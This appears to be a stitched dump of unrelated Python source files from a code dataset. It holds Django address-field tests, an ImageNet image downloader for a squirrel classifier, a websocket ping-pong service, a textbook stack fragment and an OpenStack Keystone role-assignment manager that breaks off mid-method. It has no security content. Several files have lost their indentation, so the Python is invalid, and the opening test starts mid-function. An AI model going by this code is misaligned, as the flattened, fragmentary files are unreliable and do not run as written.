assert 1 == len(new1.default_validators)
new0 = ASNField()
new1 = ASNField()
assert 0 == len(new0.default_validators)
assert 0 == len(new1.default_validators)
new0 = IPAddressField()
new1 = IPAddressField()
assert_ip_validator(new0)
assert_ip_validator(new1)
new0 = IPNetworkField()
new1 = IPNetworkField()
assert_ip_validator(new0)
assert_ip_validator(new1)
new0 = IPPrefixField()
new1 = IPPrefixField()
assert_ip_validator(new0)
assert_ip_validator(new1)
new0 = MacAddressField()
new1 = MacAddressField()
assert 1 == len(new0.default_validators)
assert 1 == len(new1.default_validators)
def test_blank(self):
model = FullModel()
model.full_clean()
def test_asn(self):
model = FullModel()
model.asn = 42
assert 42 == model.asn
model.full_clean()
with pytest.raises(ValidationError):
model.asn = "invalid"
model.full_clean()
with pytest.raises(ValidationError):
model.asn = -1
model.full_clean()
model.asn = 4294967295
model.full_clean()
assert model.asn == 4294967295
def test_ipaddress(self):
model = FullModel()
model.ip_address = "10.0.0.0"
assert ipaddress.ip_address("10.0.0.0") == model.ip_address
with pytest.raises(ValidationError):
model.ip_address = "invalid"
def test_ipv4(self):
model = FullModel()
model.ipv4 = "10.0.0.0"
assert ipaddress.ip_address("10.0.0.0") == model.ipv4
with pytest.raises(ValidationError):
model.ipv4 = "fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b"
def test_ipv6(self):
model = FullModel()
model.ipv6 = "10::"
assert ipaddress.ip_address("10::") == model.ipv6
with pytest.raises(ValidationError):
model.ipv6 = "10.0.0.0"
def test_ipnetwork(self):
model = FullModel()
model.prefix = "10.0.0.0/8"
with pytest.raises(ValidationError):
model.prefix = "invalid"
def test_mac(self):
model = FullModel()
model.mac = "Ff:00:00:12:34:56"
model.full_clean()
assert "Ff:00:00:12:34:56" == model.mac
with pytest.raises(ValidationError):
model.mac = "invalid"
model.full_clean()
| StarcoderdataPython |
169554 | '''
Module to define the dataset(s) used for training and validation
'''
__author__ = '<NAME>'
from simpleml.datasets import PandasDataset
import os
import numpy as np
import pandas as pd
import requests
import cv2
from tqdm import tqdm
current_directory = os.path.dirname(os.path.realpath(__file__))
NEGATIVE_IMAGE_DIRECTORY = os.path.abspath(os.path.join(current_directory, '../../data/negative/'))
POSITIVE_IMAGE_DIRECTORY = os.path.abspath(os.path.join(current_directory, '../../data/positive/'))
IMAGENET_LINK_DIRECTORY = os.path.abspath(os.path.join(current_directory, '../../data/imagenet_links/'))
NEGATIVE_LABEL = 0
POSITIVE_LABEL = 1
IMAGENET_POSITIVE_LABEL = 'squirrel'
class ImageLoadingDataset(PandasDataset):
def download_images(self):
# Check if already downloaded before doing anything
already_downloaded = self.state.get('links_downloaded', False)
if already_downloaded:
return
# Load Txt links
link_dictionary = {}
for filename in os.listdir(IMAGENET_LINK_DIRECTORY):
with open(os.path.join(IMAGENET_LINK_DIRECTORY, filename)) as f:
link_dictionary[filename[:-4]] = [x.strip() for x in f.readlines()]
# Split into "positive" and "negative" lists
positive_links = link_dictionary[IMAGENET_POSITIVE_LABEL]
negative_links = []
# There are duplicates, unfortunately, so have to dedupe
        for class_label, link_list in link_dictionary.items():
if class_label == IMAGENET_POSITIVE_LABEL:
continue
negative_links.extend([item for item in link_list if item not in positive_links])
for link_list, directory in zip([positive_links, negative_links], [POSITIVE_IMAGE_DIRECTORY, NEGATIVE_IMAGE_DIRECTORY]):
for link in link_list:
filename = link.rsplit('/', 1)[-1]
try:
response = requests.get(link)
if response.status_code == 200:
with open(os.path.join(directory, filename), 'wb') as f:
f.write(response.content)
except Exception as e: #requests.exceptions.ConnectionError as e:
print(e)
# Make note that links were downloaded so it wont do it again
self.state['links_downloaded'] = True
def load_images(self, directory_path, label):
file_list = []
for filename in tqdm(os.listdir(directory_path)):
filepath = os.path.join(directory_path, filename)
if os.path.isfile(filepath):
try: # Attempt to load files because many are corrupted or blank
img = cv2.imdecode(np.asarray(bytearray(open(filepath, "rb").read()), dtype=np.uint8), 1)
cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# file_list.append(filepath.decode('UTF-8')) # Python 2
file_list.append(filepath) # Python 3
except (IOError, cv2.error) as e:
print(e)
return pd.DataFrame(list(zip(file_list, [label] * len(file_list))),
columns=['image', 'label'])
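    # Note (summarizing load_images, not changing its behaviour): the returned
    # dataframe has two columns, 'image' holding readable file paths and
    # 'label' holding the integer class passed in (0 for negatives, 1 for
    # positives), so downstream code can split features and labels by name.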
class SquirrelDataset(ImageLoadingDataset):
def build_dataframe(self):
# self.download_images()
negative_df = self.load_images(NEGATIVE_IMAGE_DIRECTORY, NEGATIVE_LABEL)
positive_df = self.load_images(POSITIVE_IMAGE_DIRECTORY, POSITIVE_LABEL)
self._external_file = pd.concat([negative_df, positive_df], axis=0)
| StarcoderdataPython |
178020 | <filename>examples/heartbeat/service.py
import asyncio
import traceback
import json
from asyncio.queues import Queue
from collections import defaultdict
from uuid import uuid4 as uuidv4
import websockets
from helpers import ServmanAgent, action
from typings import IParcel
from path import Path
class PongService(ServmanAgent):
def __init__(self, *args, **kwargs):
super().__init__(connection_config=kwargs['connection_config'])
# State
self.ping_count = 0
# Connection details
# You will need this information to send parcels to the client
self.owner_id = kwargs['owner_id']
self.owner_connection_id = kwargs['owner_connection_id']
self.identifier = kwargs['identifier']
### Actions
@action()
async def ping(self, parcel: IParcel, websocket, queue):
self.ping_count += 1
new_parcel: IParcel = {
'routing': 'client',
'destination_id': self.owner_connection_id,
'action': 'pong',
'data': {
'msg': f"PONG! ({self.ping_count} pings and counting from {self._agent_id}!)"
}
}
await websocket.send(json.dumps(new_parcel))
if self.ping_count >= 10:
await asyncio.sleep(3)
try:
exit()
except BaseException:
pass
### Tasks
async def on_connect(self, websocket, queue):
parcel: IParcel = {
'routing': 'client',
'destination_id': self.owner_connection_id,
'action': 'catch_service_credentials',
'data': {
'identifier': self.identifier,
'connection_id': websocket.request_headers['connection_id']
}
}
await self._primary_websocket.send(json.dumps(parcel))
async def consume(self):
await self.wait_until_connected()
while self.ping_count < 10:
packet = await self._primary_websocket.recv()
parcel = json.loads(packet)
action = self._actions[parcel['action']]
asyncio.create_task(action.callback(action.agent, parcel, self._primary_websocket, self._primary_message_queue))
async def produce(self):
await self.wait_until_connected()
while self.ping_count < 10:
await self._primary_websocket.send(await self._primary_message_queue.get())
def pong_service(*args, **kwargs):
config_file = Path("conf/service_configuration.json")
if not config_file.exists():
print("Error: Connection config for service does not exist!")
exit()
connection_config = json.loads(config_file.read_text(encoding="utf-8"))
kwargs["connection_config"] = connection_config
pong_service = PongService(*args, **kwargs)
pong_service.run() | StarcoderdataPython |
1676424 | #
# This file contains the Python code from Program 6.8 of
# "Data Structures and Algorithms
# with Object-Oriented Design Patterns in Python"
# by <NAME>.
#
# Copyright (c) 2003 by <NAME>, P.Eng. All rights reserved.
#
# http://www.brpreiss.com/books/opus7/programs/pgm06_08.txt
#
class StackAsLinkedList(Stack):
def accept(self, visitor):
assert isinstance(visitor, Visitor)
ptr = self._list.head
while ptr is not None:
visitor.visit(ptr.datum)
if visitor.isDone:
return
ptr = ptr.next
# ...
| StarcoderdataPython |
10601 | # Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Main entry point into the Assignment service."""
import copy
import itertools
from oslo_log import log
from keystone.common import cache
from keystone.common import driver_hints
from keystone.common import manager
from keystone.common import provider_api
import keystone.conf
from keystone import exception
from keystone.i18n import _
from keystone import notifications
CONF = keystone.conf.CONF
LOG = log.getLogger(__name__)
PROVIDERS = provider_api.ProviderAPIs
# This is a general cache region for assignment administration (CRUD
# operations).
MEMOIZE = cache.get_memoization_decorator(group='role')
# This builds a discrete cache region dedicated to role assignments computed
# for a given user + project/domain pair. Any write operation to add or remove
# any role assignment should invalidate this entire cache region.
COMPUTED_ASSIGNMENTS_REGION = cache.create_region(name='computed assignments')
MEMOIZE_COMPUTED_ASSIGNMENTS = cache.get_memoization_decorator(
group='role',
region=COMPUTED_ASSIGNMENTS_REGION)
@notifications.listener
class Manager(manager.Manager):
"""Default pivot point for the Assignment backend.
See :class:`keystone.common.manager.Manager` for more details on how this
dynamically calls the backend.
"""
driver_namespace = 'keystone.assignment'
_provides_api = 'assignment_api'
_SYSTEM_SCOPE_TOKEN = 'system'
_USER_SYSTEM = 'UserSystem'
_GROUP_SYSTEM = 'GroupSystem'
_PROJECT = 'project'
_ROLE_REMOVED_FROM_USER = 'role_removed_from_user'
_INVALIDATION_USER_PROJECT_TOKENS = 'invalidate_user_project_tokens'
def __init__(self):
assignment_driver = CONF.assignment.driver
super(Manager, self).__init__(assignment_driver)
self.event_callbacks = {
notifications.ACTIONS.deleted: {
'domain': [self._delete_domain_assignments],
},
}
def _delete_domain_assignments(self, service, resource_type, operations,
payload):
domain_id = payload['resource_info']
self.driver.delete_domain_assignments(domain_id)
def _get_group_ids_for_user_id(self, user_id):
# TODO(morganfainberg): Implement a way to get only group_ids
# instead of the more expensive to_dict() call for each record.
return [x['id'] for
x in PROVIDERS.identity_api.list_groups_for_user(user_id)]
def list_user_ids_for_project(self, tenant_id):
PROVIDERS.resource_api.get_project(tenant_id)
assignment_list = self.list_role_assignments(
project_id=tenant_id, effective=True)
# Use set() to process the list to remove any duplicates
return list(set([x['user_id'] for x in assignment_list]))
def _send_app_cred_notification_for_role_removal(self, role_id):
"""Delete all application credential for a specific role.
:param role_id: role identifier
:type role_id: string
"""
assignments = self.list_role_assignments(role_id=role_id)
for assignment in assignments:
if 'user_id' in assignment and 'project_id' in assignment:
payload = {
'user_id': assignment['user_id'],
'project_id': assignment['project_id']
}
notifications.Audit.internal(
notifications.REMOVE_APP_CREDS_FOR_USER, payload
)
@MEMOIZE_COMPUTED_ASSIGNMENTS
def get_roles_for_user_and_project(self, user_id, tenant_id):
"""Get the roles associated with a user within given project.
This includes roles directly assigned to the user on the
project, as well as those by virtue of group membership or
inheritance.
:returns: a list of role ids.
:raises keystone.exception.ProjectNotFound: If the project doesn't
exist.
"""
PROVIDERS.resource_api.get_project(tenant_id)
assignment_list = self.list_role_assignments(
user_id=user_id, project_id=tenant_id, effective=True)
# Use set() to process the list to remove any duplicates
return list(set([x['role_id'] for x in assignment_list]))
@MEMOIZE_COMPUTED_ASSIGNMENTS
def get_roles_for_trustor_and_project(self, trustor_id, project_id):
"""Get the roles associated with a trustor within given project.
This includes roles directly assigned to the trustor on the
project, as well as those by virtue of group membership or
inheritance, but it doesn't include the domain roles.
:returns: a list of role ids.
:raises keystone.exception.ProjectNotFound: If the project doesn't
exist.
"""
PROVIDERS.resource_api.get_project(project_id)
assignment_list = self.list_role_assignments(
user_id=trustor_id, project_id=project_id, effective=True,
strip_domain_roles=False)
# Use set() to process the list to remove any duplicates
return list(set([x['role_id'] for x in assignment_list]))
@MEMOIZE_COMPUTED_ASSIGNMENTS
def get_roles_for_user_and_domain(self, user_id, domain_id):
"""Get the roles associated with a user within given domain.
:returns: a list of role ids.
:raises keystone.exception.DomainNotFound: If the domain doesn't exist.
"""
PROVIDERS.resource_api.get_domain(domain_id)
assignment_list = self.list_role_assignments(
user_id=user_id, domain_id=domain_id, effective=True)
# Use set() to process the list to remove any duplicates
return list(set([x['role_id'] for x in assignment_list]))
def get_roles_for_groups(self, group_ids, project_id=None, domain_id=None):
"""Get a list of roles for this group on domain and/or project."""
# if no group ids were passed, there are no roles. Without this check,
# all assignments for the project or domain will be fetched,
# which is not what we want.
if not group_ids:
return []
if project_id is not None:
PROVIDERS.resource_api.get_project(project_id)
assignment_list = self.list_role_assignments(
source_from_group_ids=group_ids, project_id=project_id,
effective=True)
elif domain_id is not None:
assignment_list = self.list_role_assignments(
source_from_group_ids=group_ids, domain_id=domain_id,
effective=True)
else:
raise AttributeError(_("Must specify either domain or project"))
role_ids = list(set([x['role_id'] for x in assignment_list]))
return PROVIDERS.role_api.list_roles_from_ids(role_ids)
@notifications.role_assignment('created')
def _add_role_to_user_and_project_adapter(self, role_id, user_id=None,
group_id=None, domain_id=None,
project_id=None,
inherited_to_projects=False,
context=None):
# The parameters for this method must match the parameters for
# create_grant so that the notifications.role_assignment decorator
# will work.
PROVIDERS.resource_api.get_project(project_id)
PROVIDERS.role_api.get_role(role_id)
self.driver.add_role_to_user_and_project(user_id, project_id, role_id)
def add_role_to_user_and_project(self, user_id, tenant_id, role_id):
self._add_role_to_user_and_project_adapter(
role_id, user_id=user_id, project_id=tenant_id)
COMPUTED_ASSIGNMENTS_REGION.invalidate()
# TODO(henry-nash): We might want to consider list limiting this at some
# point in the future.
@MEMOIZE_COMPUTED_ASSIGNMENTS
def list_projects_for_user(self, user_id):
# FIXME(lbragstad): Without the use of caching, listing effective role
# assignments is slow, especially with large data set (lots of users
# with multiple role assignments). This should serve as a marker in
# case we have the opportunity to come back and optimize this code so
# that it can be performant without having a hard dependency on
# caching. Please see https://bugs.launchpad.net/keystone/+bug/1700852
# for more details.
assignment_list = self.list_role_assignments(
user_id=user_id, effective=True)
# Use set() to process the list to remove any duplicates
project_ids = list(set([x['project_id'] for x in assignment_list
if x.get('project_id')]))
return PROVIDERS.resource_api.list_projects_from_ids(project_ids)
# TODO(henry-nash): We might want to consider list limiting this at some
# point in the future.
@MEMOIZE_COMPUTED_ASSIGNMENTS
def list_domains_for_user(self, user_id):
assignment_list = self.list_role_assignments(
user_id=user_id, effective=True)
# Use set() to process the list to remove any duplicates
domain_ids = list(set([x['domain_id'] for x in assignment_list
if x.get('domain_id')]))
return PROVIDERS.resource_api.list_domains_from_ids(domain_ids)
def list_domains_for_groups(self, group_ids):
assignment_list = self.list_role_assignments(
source_from_group_ids=group_ids, effective=True)
domain_ids = list(set([x['domain_id'] for x in assignment_list
if x.get('domain_id')]))
return PROVIDERS.resource_api.list_domains_from_ids(domain_ids)
def list_projects_for_groups(self, group_ids):
assignment_list = self.list_role_assignments(
source_from_group_ids=group_ids, effective=True)
project_ids = list(set([x['project_id'] for x in assignment_list
if x.get('project_id')]))
return PROVIDERS.resource_api.list_projects_from_ids(project_ids)
@notifications.role_assignment('deleted')
def _remove_role_from_user_and_project_adapter(self, role_id, user_id=None,
group_id=None,
domain_id=None,
project_id=None,
inherited_to_projects=False,
context=None):
# The parameters for this method must match the parameters for
# delete_grant so that the notifications.role_assignment decorator
# will work.
self.driver.remove_role_from_user_and_project(user_id, project_id,
role_id)
payload = {'user_id': user_id, 'project_id': project_id}
notifications.Audit.internal(
notifications.REMOVE_APP_CREDS_FOR_USER,
payload
)
self._invalidate_token_cache(
role_id, group_id, user_id, project_id, domain_id
)
def remove_role_from_user_and_project(self, user_id, tenant_id, role_id):
self._remove_role_from_user_and_project_adapter(
role_id, user_id=user_id, project_id=tenant_id)
COMPUTED_ASSIGNMENTS_REGION.invalidate()
def _invalidate_token_cache(self, role_id, group_id, user_id, project_id,
domain_id):
if group_id:
actor_type = 'group'
actor_id = group_id
elif user_id:
actor_type = 'user'
actor_id = user_id
if domain_id:
target_type = 'domain'
target_id = domain_id
elif project_id:
target_type = 'project'
target_id = project_id
reason = (
'Invalidating the token cache because role %(role_id)s was '
'removed from %(actor_type)s %(actor_id)s on %(target_type)s '
'%(target_id)s.' %
{'role_id': role_id, 'actor_type': actor_type,
'actor_id': actor_id, 'target_type': target_type,
'target_id': target_id}
)
notifications.invalidate_token_cache_notification(reason)
@notifications.role_assignment('created')
def create_grant(self, role_id, user_id=None, group_id=None,
domain_id=None, project_id=None,
inherited_to_projects=False,
initiator=None):
role = PROVIDERS.role_api.get_role(role_id)
if domain_id:
PROVIDERS.resource_api.get_domain(domain_id)
if project_id:
project = PROVIDERS.resource_api.get_project(project_id)
# For domain specific roles, the domain of the project
# and role must match
if role['domain_id'] and project['domain_id'] != role['domain_id']:
raise exception.DomainSpecificRoleMismatch(
role_id=role_id,
project_id=project_id)
self.driver.create_grant(
role_id, user_id=user_id, group_id=group_id, domain_id=domain_id,
project_id=project_id, inherited_to_projects=inherited_to_projects
)
COMPUTED_ASSIGNMENTS_REGION.invalidate()
def get_grant(self, role_id, user_id=None, group_id=None,
domain_id=None, project_id=None,
inherited_to_projects=False):
role_ref = PROVIDERS.role_api.get_role(role_id)
if domain_id:
PROVIDERS.resource_api.get_domain(domain_id)
if project_id:
PROVIDERS.resource_api.get_project(project_id)
self.check_grant_role_id(
role_id, user_id=user_id, group_id=group_id, domain_id=domain_id,
project_id=project_id, inherited_to_projects=inherited_to_projects
)
return role_ref
def list_grants(self, user_id=None, group_id=None,
domain_id=None, project_id=None,
inherited_to_projects=False):
if domain_id:
PROVIDERS.resource_api.get_domain(domain_id)
if project_id:
PROVIDERS.resource_api.get_project(project_id)
grant_ids = self.list_grant_role_ids(
user_id=user_id, group_id=group_id, domain_id=domain_id,
project_id=project_id, inherited_to_projects=inherited_to_projects
)
return PROVIDERS.role_api.list_roles_from_ids(grant_ids)
@notifications.role_assignment('deleted')
def delete_grant(self, role_id, user_id=None, group_id=None,
domain_id=None, project_id=None,
inherited_to_projects=False,
initiator=None):
# check if role exist before any processing
PROVIDERS.role_api.get_role(role_id)
if group_id is None:
# check if role exists on the user before revoke
self.check_grant_role_id(
role_id, user_id=user_id, group_id=None, domain_id=domain_id,
project_id=project_id,
inherited_to_projects=inherited_to_projects
)
self._invalidate_token_cache(
role_id, group_id, user_id, project_id, domain_id
)
else:
try:
# check if role exists on the group before revoke
self.check_grant_role_id(
role_id, user_id=None, group_id=group_id,
domain_id=domain_id, project_id=project_id,
inherited_to_projects=inherited_to_projects
)
if CONF.token.revoke_by_id:
self._invalidate_token_cache(
role_id, group_id, user_id, project_id, domain_id
)
except exception.GroupNotFound:
LOG.debug('Group %s not found, no tokens to invalidate.',
group_id)
if domain_id:
PROVIDERS.resource_api.get_domain(domain_id)
if project_id:
PROVIDERS.resource_api.get_project(project_id)
self.driver.delete_grant(
role_id, user_id=user_id, group_id=group_id, domain_id=domain_id,
project_id=project_id, inherited_to_projects=inherited_to_projects
)
COMPUTED_ASSIGNMENTS_REGION.invalidate()
# The methods _expand_indirect_assignment, _list_direct_role_assignments
# and _list_effective_role_assignments below are only used on
# list_role_assignments, but they are not in its scope as nested functions
# since it would significantly increase McCabe complexity, that should be
# kept as it is in order to detect unnecessarily complex code, which is not
# this case.
def _expand_indirect_assignment(self, ref, user_id=None, project_id=None,
subtree_ids=None, expand_groups=True):
"""Return a list of expanded role assignments.
This methods is called for each discovered assignment that either needs
a group assignment expanded into individual user assignments, or needs
an inherited assignment to be applied to its children.
In all cases, if either user_id and/or project_id is specified, then we
filter the result on those values.
If project_id is specified and subtree_ids is None, then this
indicates that we are only interested in that one project. If
subtree_ids is not None, then this is an indicator that any
inherited assignments need to be expanded down the tree. The
actual subtree_ids don't need to be used as a filter here, since we
already ensured only those assignments that could affect them
were passed to this method.
If expand_groups is True then we expand groups out to a list of
assignments, one for each member of that group.
"""
def create_group_assignment(base_ref, user_id):
"""Create a group assignment from the provided ref."""
ref = copy.deepcopy(base_ref)
ref['user_id'] = user_id
indirect = ref.setdefault('indirect', {})
indirect['group_id'] = ref.pop('group_id')
return ref
def expand_group_assignment(ref, user_id):
"""Expand group role assignment.
For any group role assignment on a target, it is replaced by a list
of role assignments containing one for each user of that group on
that target.
An example of accepted ref is::
{
'group_id': group_id,
'project_id': project_id,
'role_id': role_id
}
Once expanded, it should be returned as a list of entities like the
one below, one for each each user_id in the provided group_id.
::
{
'user_id': user_id,
'project_id': project_id,
'role_id': role_id,
'indirect' : {
'group_id': group_id
}
}
Returned list will be formatted by the Controller, which will
deduce a role assignment came from group membership if it has both
'user_id' in the main body of the dict and 'group_id' in indirect
subdict.
"""
if user_id:
return [create_group_assignment(ref, user_id=user_id)]
# Note(prashkre): Try to get the users in a group,
# if a group wasn't found in the backend, users are set
# as empty list.
try:
users = PROVIDERS.identity_api.list_users_in_group(
ref['group_id'])
except exception.GroupNotFound:
LOG.warning('Group %(group)s was not found but still has role '
'assignments.', {'group': ref['group_id']})
users = []
return [create_group_assignment(ref, user_id=m['id'])
for m in users]
def expand_inherited_assignment(ref, user_id, project_id, subtree_ids,
expand_groups):
"""Expand inherited role assignments.
If expand_groups is True and this is a group role assignment on a
target, replace it by a list of role assignments containing one for
each user of that group, on every project under that target. If
expand_groups is False, then return a group assignment on an
inherited target.
If this is a user role assignment on a specific target (i.e.
project_id is specified, but subtree_ids is None) then simply
format this as a single assignment (since we are effectively
filtering on project_id). If however, project_id is None or
subtree_ids is not None, then replace this one assignment with a
list of role assignments for that user on every project under
that target.
An example of accepted ref is::
{
'group_id': group_id,
'project_id': parent_id,
'role_id': role_id,
'inherited_to_projects': 'projects'
}
Once expanded, it should be returned as a list of entities like the
            one below, one for each user_id in the provided group_id and
for each subproject_id in the project_id subtree.
::
{
'user_id': user_id,
'project_id': subproject_id,
'role_id': role_id,
'indirect' : {
'group_id': group_id,
'project_id': parent_id
}
}
            The returned list will be formatted by the Controller, which will
            deduce that a role assignment came from group membership if it has
            both 'user_id' in the main body of the dict and 'group_id' in the
            'indirect' subdict. Likewise, it can deduce that the assignment
            came from inheritance if it contains both a 'project_id' in the
            main body of the dict and a 'parent_id' in the 'indirect' subdict.
"""
def create_inherited_assignment(base_ref, project_id):
"""Create a project assignment from the provided ref.
base_ref can either be a project or domain inherited
assignment ref.
"""
ref = copy.deepcopy(base_ref)
indirect = ref.setdefault('indirect', {})
if ref.get('project_id'):
indirect['project_id'] = ref.pop('project_id')
else:
indirect['domain_id'] = ref.pop('domain_id')
ref['project_id'] = project_id
ref.pop('inherited_to_projects')
return ref
# Define expanded project list to which to apply this assignment
if project_id:
# Since ref is an inherited assignment and we are filtering by
# project(s), we are only going to apply the assignment to the
# relevant project(s)
project_ids = [project_id]
if subtree_ids:
project_ids += subtree_ids
# If this is a domain inherited assignment, then we know
# that all the project_ids will get this assignment. If
# it's a project inherited assignment, and the assignment
# point is an ancestor of project_id, then we know that
# again all the project_ids will get the assignment. If,
# however, the assignment point is within the subtree,
# then only a partial tree will get the assignment.
resource_api = PROVIDERS.resource_api
if ref.get('project_id'):
if ref['project_id'] in project_ids:
project_ids = (
[x['id'] for x in
resource_api.list_projects_in_subtree(
ref['project_id'])])
elif ref.get('domain_id'):
# A domain inherited assignment, so apply it to all projects
# in this domain
project_ids = (
[x['id'] for x in
PROVIDERS.resource_api.list_projects_in_domain(
ref['domain_id'])])
else:
# It must be a project assignment, so apply it to its subtree
project_ids = (
[x['id'] for x in
PROVIDERS.resource_api.list_projects_in_subtree(
ref['project_id'])])
new_refs = []
if 'group_id' in ref:
if expand_groups:
# Expand role assignment to all group members on any
# inherited target of any of the projects
for ref in expand_group_assignment(ref, user_id):
new_refs += [create_inherited_assignment(ref, proj_id)
for proj_id in project_ids]
else:
# Just place the group assignment on any inherited target
# of any of the projects
new_refs += [create_inherited_assignment(ref, proj_id)
for proj_id in project_ids]
else:
# Expand role assignment for all projects
new_refs += [create_inherited_assignment(ref, proj_id)
for proj_id in project_ids]
return new_refs
if ref.get('inherited_to_projects') == 'projects':
return expand_inherited_assignment(
ref, user_id, project_id, subtree_ids, expand_groups)
elif 'group_id' in ref and expand_groups:
return expand_group_assignment(ref, user_id)
return [ref]
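    # Illustrative sketch (not part of the original module; the IDs below are
    # hypothetical): given a stored group assignment
    #     {'group_id': 'g1', 'project_id': 'p1', 'role_id': 'r1'}
    # where group 'g1' contains users 'u1' and 'u2', group expansion yields
    #     [{'user_id': 'u1', 'project_id': 'p1', 'role_id': 'r1',
    #       'indirect': {'group_id': 'g1'}},
    #      {'user_id': 'u2', 'project_id': 'p1', 'role_id': 'r1',
    #       'indirect': {'group_id': 'g1'}}]
    # Inherited assignments are expanded the same way, with the assignment
    # target recorded in the 'indirect' subdict instead.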
def add_implied_roles(self, role_refs):
"""Expand out implied roles.
The role_refs passed in have had all inheritance and group assignments
expanded out. We now need to look at the role_id in each ref and see
if it is a prior role for some implied roles. If it is, then we need to
duplicate that ref, one for each implied role. We store the prior role
in the indirect dict that is part of such a duplicated ref, so that a
caller can determine where the assignment came from.
"""
def _make_implied_ref_copy(prior_ref, implied_role_id):
# Create a ref for an implied role from the ref of a prior role,
# setting the new role_id to be the implied role and the indirect
# role_id to be the prior role
implied_ref = copy.deepcopy(prior_ref)
implied_ref['role_id'] = implied_role_id
indirect = implied_ref.setdefault('indirect', {})
indirect['role_id'] = prior_ref['role_id']
return implied_ref
if not CONF.token.infer_roles:
return role_refs
try:
implied_roles_cache = {}
role_refs_to_check = list(role_refs)
ref_results = list(role_refs)
checked_role_refs = list()
            while role_refs_to_check:
next_ref = role_refs_to_check.pop()
checked_role_refs.append(next_ref)
next_role_id = next_ref['role_id']
if next_role_id in implied_roles_cache:
implied_roles = implied_roles_cache[next_role_id]
else:
implied_roles = (
PROVIDERS.role_api.list_implied_roles(next_role_id))
implied_roles_cache[next_role_id] = implied_roles
for implied_role in implied_roles:
implied_ref = (
_make_implied_ref_copy(
next_ref, implied_role['implied_role_id']))
if implied_ref in checked_role_refs:
# Avoid traversing a cycle
continue
else:
ref_results.append(implied_ref)
role_refs_to_check.append(implied_ref)
except exception.NotImplemented:
LOG.error('Role driver does not support implied roles.')
return ref_results
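    # Illustrative sketch (not part of the original module; role names are
    # hypothetical): if role 'admin' implies role 'reader', an expanded ref
    #     {'user_id': 'u1', 'project_id': 'p1', 'role_id': 'admin'}
    # is duplicated by add_implied_roles into an additional ref
    #     {'user_id': 'u1', 'project_id': 'p1', 'role_id': 'reader',
    #      'indirect': {'role_id': 'admin'}}
    # and the new ref is itself checked for further implied roles; the
    # checked_role_refs list prevents looping forever on cyclic rules.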
def _filter_by_role_id(self, role_id, ref_results):
        # If we arrive here, we need to filter the results by role_id.
filter_results = []
for ref in ref_results:
if ref['role_id'] == role_id:
filter_results.append(ref)
return filter_results
def _strip_domain_roles(self, role_refs):
"""Post process assignment list for domain roles.
Domain roles are only designed to do the job of inferring other roles
and since that has been done before this method is called, we need to
remove any assignments that include a domain role.
"""
def _role_is_global(role_id):
ref = PROVIDERS.role_api.get_role(role_id)
return (ref['domain_id'] is None)
filter_results = []
for ref in role_refs:
if _role_is_global(ref['role_id']):
filter_results.append(ref)
return filter_results
def _list_effective_role_assignments(self, role_id, user_id, group_id,
domain_id, project_id, subtree_ids,
inherited, source_from_group_ids,
strip_domain_roles):
"""List role assignments in effective mode.
When using effective mode, besides the direct assignments, the indirect
ones that come from grouping or inheritance are retrieved and will then
be expanded.
        The resulting list of assignments will be filtered by the provided
        parameters. If subtree_ids is not None, then all subtree_ids are
        included in the filter as well. Since we are in effective mode, group
        can never act as a filter (since group assignments are expanded into
        user roles) and domain can only be a filter if we want non-inherited
        assignments, since domains can't inherit assignments.
        The goal of this method is to only ask the driver for those
        assignments that could affect the result based on the parameter
        filters specified, hence avoiding retrieving a huge list.
"""
def list_role_assignments_for_actor(
role_id, inherited, user_id=None, group_ids=None,
project_id=None, subtree_ids=None, domain_id=None):
"""List role assignments for actor on target.
List direct and indirect assignments for an actor, optionally
for a given target (i.e. projects or domain).
:param role_id: List for a specific role, can be None meaning all
roles
:param inherited: Indicates whether inherited assignments or only
direct assignments are required. If None, then
both are required.
:param user_id: If not None, list only assignments that affect this
user.
:param group_ids: A list of groups required. Only one of user_id
and group_ids can be specified
:param project_id: If specified, only include those assignments
that affect at least this project, with
additionally any projects specified in
subtree_ids
:param subtree_ids: The list of projects in the subtree. If
specified, also include those assignments that
affect these projects. These projects are
guaranteed to be in the same domain as the
project specified in project_id. subtree_ids
can only be specified if project_id has also
been specified.
:param domain_id: If specified, only include those assignments
that affect this domain - by definition this will
not include any inherited assignments
:returns: List of assignments matching the criteria. Any inherited
or group assignments that could affect the resulting
response are included.
"""
project_ids_of_interest = None
if project_id:
if subtree_ids:
project_ids_of_interest = subtree_ids + [project_id]
else:
project_ids_of_interest = [project_id]
# List direct project role assignments
non_inherited_refs = []
if inherited is False or inherited is None:
# Get non inherited assignments
non_inherited_refs = self.driver.list_role_assignments(
role_id=role_id, domain_id=domain_id,
project_ids=project_ids_of_interest, user_id=user_id,
group_ids=group_ids, inherited_to_projects=False)
inherited_refs = []
if inherited is True or inherited is None:
# Get inherited assignments
if project_id:
# The project and any subtree are guaranteed to be owned by
# the same domain, so since we are filtering by these
# specific projects, then we can only get inherited
# assignments from their common domain or from any of
# their parents projects.
# List inherited assignments from the project's domain
proj_domain_id = PROVIDERS.resource_api.get_project(
project_id)['domain_id']
inherited_refs += self.driver.list_role_assignments(
role_id=role_id, domain_id=proj_domain_id,
user_id=user_id, group_ids=group_ids,
inherited_to_projects=True)
# For inherited assignments from projects, since we know
# they are from the same tree the only places these can
# come from are from parents of the main project or
# inherited assignments on the project or subtree itself.
source_ids = [project['id'] for project in
PROVIDERS.resource_api.list_project_parents(
project_id)]
if subtree_ids:
source_ids += project_ids_of_interest
if source_ids:
inherited_refs += self.driver.list_role_assignments(
role_id=role_id, project_ids=source_ids,
user_id=user_id, group_ids=group_ids,
inherited_to_projects=True)
else:
# List inherited assignments without filtering by target
inherited_refs = self.driver.list_role_assignments(
role_id=role_id, user_id=user_id, group_ids=group_ids,
inherited_to_projects=True)
return non_inherited_refs + inherited_refs
# If filtering by group or inherited domain assignment the list is
# guaranteed to be empty
if group_id or (domain_id and inherited):
return []
if user_id and source_from_group_ids:
# You can't do both - and since source_from_group_ids is only used
# internally, this must be a coding error by the caller.
msg = _('Cannot list assignments sourced from groups and filtered '
'by user ID.')
raise exception.UnexpectedError(msg)
# If filtering by domain, then only non-inherited assignments are
